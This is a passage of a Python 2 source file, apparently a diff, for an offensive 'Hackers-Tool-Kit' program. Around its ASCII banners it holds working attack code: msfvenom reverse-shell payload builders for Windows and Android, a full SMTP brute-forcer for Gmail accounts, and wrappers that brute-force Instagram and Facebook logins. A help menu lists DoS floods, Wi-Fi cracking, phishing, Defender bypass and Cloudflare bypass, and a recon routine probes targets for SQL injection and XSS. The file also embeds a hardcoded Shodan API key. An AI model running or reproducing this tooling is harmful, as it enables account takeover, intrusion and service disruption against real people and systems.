+██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner13(): + print """\033[92m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner14(): + print """\033[34m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner15(): + print """\033[93m + __ _ + _wr"" "-q__ + _dP 9m_ + _#P 9#_ + d#@ \033[92mtype ? for help\033[93m 9#m + d## ### + J### ###L + {###K J###K + ]####K ___aaa___ J####F + __gmM######_ w#P"" ""9#m _d#####Mmw__ + _g##############mZ_ __g##############m_ + _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ + a###"" ,Z"#####@" '######"\g ""M##m + J#@" 0L "*## ##@" J# *#K + #" `# "_gmwgm_~ dF `#_ +7F "#_ ]#####F _dK JE +] *m__ ##### __g@" F + \033[92m@tuf_unkn0wn\033[93m "PJ#####LP" \033[92mhackers-tool-kit\033[93m + ` 0######_ ' + _0########_ + . _d#####^#####m__ , + "*w_________am#####P" ~9#####mw_________w*" + ""9@#####@M"" ""P@#####@M"" +\033[92m + ██░ ██ ▄▄▄█████▓ ██ ▄█▀ + ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ + ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ + ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ + ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄ + ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒ + ▒ ░▒░ ░ ░ ░ ░▒ ▒░ + ░ ░░ ░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░\033[0m + """.decode('utf-8') +def mainbanner16(): + print """\033[91m + :PB@Bk: + ,jB@@B@B@B@BBL. + 7G@B@B@BMMMMMB@B@B@Nr + :kB@B@@@MMOMOMOMOMMMM@B@B@B1, + :5@B@B@B@BBMMOMOMOMOMOMOMM@@@B@B@BBu. + 70@@@B@B@B@BXBBOMOMOMOMOMOMMBMPB@B@B@B@B@Nr + G@@@BJ iB@B@@ OBMOMOMOMOMOMOM@2 B@B@B. EB@B@S + @@BM@GJBU. iSuB@OMOMOMOMOMOMM@OU1: .kBLM@M@B@ + B@MMB@B 7@BBMMOMOMOMOMOBB@: B@BMM@B + @@@B@B 7@@@MMOMOMOMM@B@: @@B@B@ + @@OLB. BNB@MMOMOMM@BEB rBjM@B + @@ @ M OBOMOMM@q M .@ @@ + @@OvB B:u@MMO\033[31mMOMMBJiB .BvM@B + @B@B@J 0@B@MMOMOMOMB@B@u q@@@B@ + B@MBB@v G@@BMMMMMMMMMMMBB@5 F@BMM@B + @BBM@BPNi LMEB@OMMMM@B@MMOMM@BZM7 rEqB@MBB@ + B@@@BM B@B@B qBMOMB@B@B@BMOMBL B@B@B @B@B@M + J@@@@PB@B@B@B7G@OMBB. ,@MMM@qLB@B@@@BqB@BBv + iGB@,i0@M@B@MMO@E : M@OMM@@@B@Pii@@N: + . B@M@B@MMM@B@B@B@MMM@@@M@B + @B@B.i@MBB@B@B@@BM@::B@B@ + B@@@ .B@B.:@B@ :B@B @B@O + :0 r@B@ B@@ .@B@: P: + vMB :@B@ :BO7 + ,B@B\033[0m + + \033[32m╔═══\033[93m+\033[0mHackers-Tool-Kit\033[93m+\033[32m════╗\033[0m + ███████████████████████████ + type █?█ for help + ███ + \033[31m▄▄ ▄▄ \033[0m███\033[31m ▄▄ ▄▄▄ + ██ ██ \033[0m███\033[31m ██ ██▀ + ██ ██ \033[0m███\033[31m ██▄██ + ████████ \033[0m███\033[31m █████ + ██ ██ \033[0m███\033[31m ██ ██▄ + ██ ██ \033[0m███\033[31m ██ ██▄ + ▀▀ ▀▀ \033[0m▀▀▀\033[31m ▀▀ ▀▀\033[0m + """.decode('utf-8') +def mainbanner17(): + print """ + + .---. + |---| + type |-\033[32m?\033[0m-| for help + |---| + .---^ - ^---. + :___________: + \033[31m▄█ █▄\033[0m | |//| \033[32m▄█ ▄█▄\033[0m + ███ ███ | |//| ███ ▄███▀ + ███ ███ | |//| ███▐██▀ + ███▄▄▄▄███ | |//| █████▀ + ███▀▀▀▀███ | |//| █████▄ + ███ ███ | |//| ███▐██▄ + ███ ███ | |.-| ███ ▀███▄ + \033[31m███ ███\033[0m |.-'**| \033[32m███ ▀█▀\033[0m + \***/ + \*\033[91m/\033[31m + V\033[0m + """.decode('utf-8') +def mainbanner18(): + print """ + Type \033[31m?\033[0m For\033[31m Help\033[0m +\033[31m╔═══╗ ╔═══╗ ╔═════════════════════╗ ╔═══╗ ╔═══╗ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m║ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔═╝\033[0mHTK\033[31m╔╝ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ╚════════╗\033[0mHTK\033[31m╔════════╝ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m╔═╝ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║╔╝\033[0mHTK\033[31m╔╝ +║\033[0mHTK\033[31m╚═══════════╝\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m╚╝\033[0mHTK\033[31m╔╝ +║\033[0mHTKHHHHHHHHHHHHHHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK HTK\033[31m╔╝ +║\033[0mHTKTTTTTTTTTTTTTHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTK \033[31m╚╗\033[0m +║\033[31mHTKKKKKKKKKKKKKKHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m╔╗\033[31mHTK\033[0m╚═╗ +║\033[31mHTK\033[0m╔═══════════╗\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║╚═╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m║ +╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ + """.decode('utf-8') +def mainbanner19(): + print """\033[31m + # # + # # + %# \033[0m@tuf_unkn0wn\033[31m ## + ,%/ /%, + %## ##% + &%## ##%& + ,%%#####/. ,/#####%%, + %&%%#####/ \033[0m████\033[31m /#####%%&% + .&&%%%&& \033[0m████\033[31m &&%%%&&. + /&%( \033[0m████\033[31m (%&( + \033[0m████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + \033[31m██████\033[31m type \033[0m█\033[31m??\033[0m█ \033[31mfor help ██████ +██ \033[0m██████████████████████████████\033[31m ██ +███████ \033[0m██████████████████████████████\033[31m ███████ +██ ██ \033[0m████ \033[31m ██ ██ + ██████ \033[0m████ \033[31m ██████ + ▒ ▓▒ ▒ ▒ ▓▒ ▒ + ░ ▒ ░ ██████ ░ ▒ ░ + ░ ░ ██ ░ ░ + ███████ + ██ ██ + ██████ + ▒ ▓▒ ▒ + ░ ▒ ░ + ░ ░\033[0m + """.decode('utf-8') +def mainbanner20(): + print """ + + + ██╗\033[31m██╗ ██╗\033[0m██╗ ██╗\033[92m████████╗\033[0m██╗ ██╗\033[34m██╗ ██╗\033[0m██╗ + ██╔╝\033[31m██║ \033[31m██║\033[0m╚██╗ ██╔╝\033[92m╚══\033[92m██╔══╝\033[0m╚██╗ ██╔╝\033[34m██║ ██╔╝\033[0m╚██╗ +██╔╝ \033[31m███████║ \033[0m╚██╗██╔╝\033[92m ██║ \033[0m╚██╗██╔╝\033[34m █████╔╝ \033[0m╚██╗ +╚██╗ \033[31m██╔══██║ \033[0m██╔╝╚██╗ \033[92m██║ \033[0m ██╔╝╚██╗\033[34m ██╔═██╗\033[0m ██╔╝ + ╚██╗\033[31m██║ ██║\033[0m██╔╝ ╚██╗\033[92m ██║ \033[0m ██╔╝ ╚██╗\033[34m██║ ██╗\033[0m██╔╝ + ╚═╝\033[31m╚═╝ ╚═╝\033[0m╚═╝ ╚═╝\033[92m ╚═╝ \033[0m ╚═╝ ╚═╝\033[34m╚═╝ ╚═╝\033[0m╚═╝ + + + """.decode('utf-8') + + +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,20) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() + if num == 8: + mainbanner8() + if num == 9: + mainbanner9() + if num == 10: + mainbanner10() + if num == 11: + mainbanner11() + if num == 12: + mainbanner12() + if num == 13: + mainbanner13() + if num == 14: + mainbanner14() + if num == 15: + mainbanner15() + if num == 16: + mainbanner16() + if num == 17: + mainbanner17() + if num == 18: + mainbanner18() + if num == 19: + mainbanner19() + if num == 20: + mainbanner20() +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +? : displays this message +update : update the hackers-tool-kit +clear : clears screen +banner : clears screen and shows new banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +run : run a file +phpload : make a php reverse_tcp payload and start it in a multi handler +pyload : make a python reverse_tcp payload and start it in a multi handler +foxhis : gather firefox history from privileged javascript shell +rhawk : run the RED_HAWK script (info gathering tool) +nano : open nano text editor +compilec: compile a c file +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") 